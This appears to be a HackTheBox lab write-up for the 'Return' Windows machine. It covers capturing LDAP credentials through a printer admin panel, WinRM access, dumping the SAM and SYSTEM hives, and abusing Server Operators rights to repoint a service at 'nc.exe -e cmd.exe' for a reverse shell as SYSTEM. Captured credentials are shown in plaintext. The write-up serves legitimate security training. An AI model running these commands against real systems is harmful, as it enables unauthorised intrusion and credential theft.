xsspresso
xsspresso
WriteupsHTB — Return
ADEasyWindows

HTB — Return

Network printer admin panel LDAP credential exfiltration via attacker-controlled server. Server Operators group membership for domain privilege escalation.

January 22, 2025HackTheBox
#AD#LDAP#Server Operators#Kerberos

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 22:33 EST
Stats: 0:01:26 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.51% done; ETC: 22:35 (0:00:00 remaining)
Nmap scan report for 10.10.11.108
Host is up (0.022s latency).
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-23 03:52:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
58735/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=1/22%OT=53%CT=1%CU=32959%PV=Y%DS=2%DC=T%G=Y%TM=6791B8F
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=
OS:U)SEQ(SP=105%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=106%GCD=1%ISR
OS:=108%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=106%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS
OS:=S%TS=U)SEQ(SP=108%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M53CNW8
OS:NNS%O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
 
Network Distance: 2 hops
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: 18m34s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-01-23T03:53:53
|_  start_date: N/A
 
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   25.41 ms 10.10.14.1
2   25.73 ms 10.10.11.108
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.32 second

80

sh
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0

sh
nc -lvnp 389

sh
 nc -lnvp 389
listening on [any] 389 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.108] 53478
0*`%return\svc-printer
                      1edFg43012!!

creds

svc-printer:1edFg43012!!

445

sh
445/tcp   open  microsoft-ds?
sh
smbclient -N -L //10.10.11.108 -U ''
 
        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.108 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availabl
sh
nxc smb 10.10.11.108 -u svc-printer -p '1edFg43012!!'
SMB         10.10.11.108    445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\svc-printer:1edFg43012!!
sh
nxc winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'
WINRM       10.10.11.108    5985   PRINTER          [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM       10.10.11.108    5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

winrm

sh
evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!

user.txt

sh
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cat user.txt
6e891fe8...

priv esc

sh
*Evil-WinRM* PS C:\Users\svc-printer> whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

SeBackupPrivilege

sh
*Evil-WinRM* PS C:\> mkdir Temp
*Evil-WinRM* PS C:\> reg save HKLM\SYSTEM C:\Temp\system.bak
*Evil-WinRM* PS C:\temp> reg save HKLM\SAM C:\Temp\sam.bak
sh
impacket-secretsdump -sam sam.bak -system system.bak local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435...:34386a77...:::
Guest:501:aad3b435...:31d6cfe0...:::
DefaultAccount:503:aad3b435...:31d6cfe0...:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Server Operators

  • can start/stop services

sh
*Evil-WinRM* PS C:\temp> upload nc.exe
sh
sc.exe config VMTools binPath="C:\Temp\nc.exe -e cmd.exe 10.10.14.6 1234"
sh
*Evil-WinRM* PS C:\temp> sc.exe qc VMTools
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Temp\nc.exe -e cmd.exe 10.10.14.6 1234
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VMware Tools
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
sh
*Evil-WinRM* PS C:\temp> sc.exe qc VMTools
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Temp\nc.exe -e cmd.exe 10.10.14.6 1234
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VMware Tools
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
*Evil-WinRM* PS C:\temp> sc.exe stop VMTools
 
SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.108] 57162
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
whoami
nt authority\system

root.txt

sh
C:\Users\Administrator\Desktop>type root.txt
type root.txt
8897fa4d...

Up next

HardJan 2025

HTB — Blackfield

ASREPRoasting yields crackable hash. ForceChangePassword on account via BloodHound. Volatility lsass dump reveals backup operator for DCSync.

Read writeup
EasyJan 2025

HTB — Support

Custom .NET info collector binary contains obfuscated LDAP password. GenericAll on DC via Resource-Based Constrained Delegation for Domain Admin.

Read writeup
MediumJan 2025

HTB — Shibboleth

IPMI 2.0 cipher 0 authentication bypass via RAKP attack dumps password hash. MariaDB CVE-2021-27928 RCE and Zabbix for lateral movement.

Read writeup